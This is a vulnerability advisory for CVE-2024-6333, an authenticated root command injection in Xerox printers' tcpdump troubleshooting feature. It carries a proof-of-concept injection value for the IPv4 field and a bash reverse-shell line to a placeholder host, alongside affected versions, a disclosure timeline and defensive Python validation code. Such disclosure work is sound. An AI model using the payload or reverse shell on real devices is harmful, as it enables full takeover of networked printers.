Authenticated Remote Code Execution in multiple Xerox printers

Title: Authenticated Remote Code Execution
Product: Multiple Xerox printers (EC80xx, AltaLink, VersaLink, WorkCentre)
Vulnerable Version: see vulnerable versions below
Fixed Version: see solution section below
CVE Number: CVE-2024-6333
Impact: high
Found: 14.12.2023
By: Timo Longin (Office Vienna), Tamas Jos (Office Zurich) | SEC Consult Vulnerability Lab

Multiple Xerox printers (EC80xx, AltaLink, VersaLink, WorkCentre) were affected by an authenticated remote code execution vulnerability which allowed an attacker with administrative web credentials to fully compromise the devices with root privileges on the operating system.

Vendor description

"We are a global leader in office and production print technology and related solutions, with a large and growing presence in Digital and IT Services. Having redefined the workplace experience for more than 100 years, our differentiated business and technology offerings are empowering client success today by addressing the productivity challenges of a hybrid workplace and distributed workforce."

Source: investors.xerox.com


Business recommendation

SEC Consult recommends that Xerox customers install the latest updates and review the vendor's security note XRX24-015 for further information.

Also make sure that patches from previous security notes, such as XRX23-020, are installed. SEC Consult re-identified some critical 0-days (unauthenticated RCE, partial authentication bypass) that had already been patched but were not clearly communicated in the previous security notes.

SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.


Vulnerability overview/description

1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)

An attacker authenticated as a user with administrative access to the web interface of a range of affected Xerox printers can exploit a remote code execution (RCE) vulnerability that runs as the root user. It allows the attacker to execute commands directly on the operating system of the printer with root permissions. Consequently, the target Xerox printer can be fully compromised.


Proof of concept

1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)

The "Network Troubleshooting" menu enables administrators to configure and run network troubleshooting based on the tcpdump tool. The web interface allows applying custom filters, such as an IPv4 address or specific network services, as seen in figure 1 below.

Figure 1: Exploiting the network troubleshooting feature

Due to insufficient input validation of the IPv4 address value, an attacker may inject further OS commands into the final tcpdump command string. For example, by setting the IPv4 address to the value "0.0.0.0$(bash $TMP~cmd)", the commands stored under "/tmp/~cmd" are executed when a network troubleshooting session is started.

Note: The payload in the IPv4 address must bypass a character filter, and was kept simple for demonstration purposes. Other payloads that directly execute commands without requiring the "/tmp/~cmd" file exist and can be crafted.

An attacker who, for example, has previously exploited the unauthenticated RCE vulnerability (fixed with Xerox Security Bulletin XRX23-020) can plant the following commands for a reverse shell into "/tmp/~cmd".

bash -i >/dev/tcp/X.X.X.X/10004 0>&1 2>&1

Since the network troubleshooting service runs tcpdump with root permissions, full access to a range of Xerox printers can be obtained this way. See figure 2 below.

Figure 2: Reverse shell
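The root cause above is an IPv4 filter value that is concatenated into a shell command string. The following is an added illustration of the mitigation, not Xerox firmware code: the address is validated as a strict dotted-quad before use, and the tcpdump invocation is assembled as an argv list so no shell ever parses the filter. The interface name, service-to-port map and packet count are assumptions for the example.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# Assumed mapping of the web UI's service names to ports (constructed example).
_SERVICE_PORTS = {"http": 80, "https": 443, "smb": 445, "lpd": 515, "ipp": 631}


def validate_ipv4(value: str) -> Optional[str]:
    """Return the canonical dotted-quad if 'value' is a plain IPv4 address,
    otherwise None. Only ASCII digits and dots are accepted, so shell
    metacharacters such as "$(", "`" or ";" never reach the command line."""
    if not re.fullmatch(r"[0-9]{1,3}(\.[0-9]{1,3}){3}", value):
        return None
    try:
        return str(ipaddress.IPv4Address(value))  # rejects octets > 255
    except ipaddress.AddressValueError:
        return None


def build_tcpdump_argv(host: Optional[str], service: Optional[str],
                       iface: str = "eth0") -> List[str]:
    """Build the tcpdump command as an argv list. The filter expression is
    passed as a single argument (data), never interpolated into a shell string."""
    filt: List[str] = []
    if host is not None:
        canonical = validate_ipv4(host)
        if canonical is None:
            raise ValueError("IPv4 filter rejected: not a dotted-quad address")
        filt.append(f"host {canonical}")
    if service is not None:
        if service not in _SERVICE_PORTS:
            raise ValueError("unknown service selected")
        filt.append(f"port {_SERVICE_PORTS[service]}")
    argv = ["tcpdump", "-n", "-i", iface, "-c", "100"]
    if filt:
        argv.append(" and ".join(filt))
    return argv


def run_capture(argv: List[str]) -> subprocess.CompletedProcess:
    # shell=False (the default): argv elements are handed to execve() verbatim,
    # so "$(...)" inside an argument is just literal text to tcpdump.
    return subprocess.run(argv, shell=False, capture_output=True, text=True)
```

With this validation the payload from the advisory, "0.0.0.0$(bash $TMP~cmd)", is rejected before any command is built; the same field still accepts an ordinary address such as "10.0.0.5".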

Vulnerable versions

The following products and versions were tested initially. According to the vendor, they were not patched to the latest version; hence the other critical security issues we identified were removed from this advisory.

  • Xerox Workcentre 7970 (073.200.167.09610)
  • Xerox Workcentre 7855 (073.040.167.09610)

According to the vendor, the following products are affected:

  • AltaLink® B8045 / B8055 / B8065 / B8075 / B8090 (<103.xxx.024.18600 866140v3)
  • AltaLink® C8030 / C8035 / C8045 / C8055 / C8070 (<103.xxx.024.18600 866140v3)
  • Xerox® EC8036 / EC8056 (<103.xxx.024.18600 872818v3)
  • Xerox® EC8036 / EC8056 - Common Criteria (June 2022) (<103.023.031.35105 878257v3)
  • Xerox® EC8036 / EC8056 - Common Criteria (June 2024) (<103.xxx.013.14115 869823v3)
  • AltaLink® C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)
  • AltaLink® B8145 / B8155 / B8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)
  • AltaLink® C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)
  • AltaLink® B8145 / B8155 / B8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)
  • VersaLink® B625 / C625 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)
  • VersaLink® B415 / C415 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)
  • WorkCentre 3655/3655i (<075.060.004.07810 via Upgrade Tool)
  • WorkCentre 5945/55i (<075.091.004.07810 via Upgrade Tool)
  • WorkCentre 6655/6655i (<075.110.004.07810 via Upgrade Tool)
  • WorkCentre 7220/7225i (<075.030.004.07810 via Upgrade Tool)
  • WorkCentre 7830/7835i (<075.010.004.07810 via Upgrade Tool)
  • WorkCentre 7845/7855i (<075.040.004.07810 via Upgrade Tool)
  • WorkCentre 7845/7855 (IBG) (<075.080.004.07810 via Upgrade Tool)
  • WorkCentre 7970/7970i (<075.200.004.07810 via Upgrade Tool)
  • WorkCentre EC7836 (<075.050.004.07810 via Upgrade Tool)
  • WorkCentre EC7856 (<075.020.004.07810 via Upgrade Tool)


Vendor contact timeline

2024-02-05 Contacting vendor through the Xerox Security Response Center (XSRC) https://forms.business.xerox.com/en-us/xerox-security-response-center/
2024-02-06 Xerox assigns case id XSRC-2024-0003
2024-02-08 Xerox provides links for the current firmware versions to confirm whether the issues can be reproduced.
2024-02-27 Xerox asks for status update.
2024-02-28 The authenticated RCE was confirmed to be exploitable in the current firmware version (075.040.013.29000 and 075.200.013.29000). Vulnerability one and two are fixed in the most recent versions.
2024-03-19 Xerox requests more information on provided PoCs.
2024-04-02 SEC Consult provides the requested information.
2024-04-18 SEC Consult asks for updates on the vulnerability status.
2024-05-06 Xerox provides an update/patch for the affected WorkCentre7890 and 7855 series.
2024-05-16 SEC Consult asks about a CVE number for the authenticated RCE vulnerability. SEC Consult also inquires about further plans for confirming the models and versions that are potentially affected by the partial authentication bypass and pre-authenticated RCE vulnerabilities.
2024-05-21 Xerox states that they are evaluating other models. Also, they request a CVSS score and vector for the authenticated RCE. Furthermore, more details on the public disclosure timeline are requested.
2024-05-23 SEC Consult provides the requested information.
2024-06-03 Status update from Xerox regarding the CVE-ID request. Furthermore, more information on the to-be-released advisory is requested.
2024-06-06 Status update from Xerox regarding the CVE-ID request.
2024-06-10 Xerox again requests a CVSS score and vector for the authenticated RCE.
2024-06-14 SEC Consult again provides the CVSS score and vector. Also, information on the to-be-released advisory is provided.
2024-06-25 Xerox provides CVE-2024-6333 for the authenticated RCE vulnerability.
2024-06-28 Informing Xerox about longer vacation period / absence. Asking again about further affected models.
2024-07-01 Xerox: Further models are affected, will be shared in the final publication.
2024-07-16 Xerox asks for our publication draft.
2024-07-31 Xerox asks again for our publication draft.
2024-07-31 SEC Consult reminds Xerox about vacation, references our draft advisory already sent a few months ago. Asking whether the other models are affected by the authenticated RCE only, or by the other identified vulnerabilities as well.
2024-08-28 Xerox provides high-level summary of the case, but no details on affected models.
2024-10-03 SEC Consult provides an updated advisory with minor changes to Xerox, again asking whether other versions and models are affected by the described vulnerabilities.
2024-10-07 Xerox provides further information on the partial authentication bypass and pre-authenticated RCE vulnerabilities, showing that these have been addressed in previous patches. Also, further coordination regarding Xerox' Security Bulletin Release.
2024-10-16 Release of Xerox Security Bulletin XRX24-015, covering the authenticated RCE vulnerability.
2024-10-18 Further coordination with Xerox on SEC Consult's advisory release.
2024-10-21 Sending latest advisory draft to Xerox, setting release date to 23rd October. Asking Xerox whether the security bulletin XRX23-020 (https://securitydocs.business.xerox.com/wp-content/uploads/2023/11/XRX23-020_Security-Bulletin-for-AltaLink-VersaLink-and-WorkCentre-1.pdf) is the correct one for the other issues and why there is no mention regarding our pre-auth RCE there. Xerox responds with the link to the latest XRX24-015 bulletin and that our advisory is fine.
2024-10-23 Coordinated release of advisory.

Solution

Xerox provided patches for the affected printers. More information can be found in Xerox' Security Bulletin XRX24-015:

securitydocs.business.xerox.com/wp-content/uploads/2024/10/Xerox-Security-Bulletin-XRX24-015-for-Altalink-Versalink-and-WorkCentre-%E2%80%93-CVE-2024-6333-.pdf


Workaround

None


Advisory URL

sec-consult.com/vulnerability-lab/


EOF Timo Longin, Tamas Jos / @2024
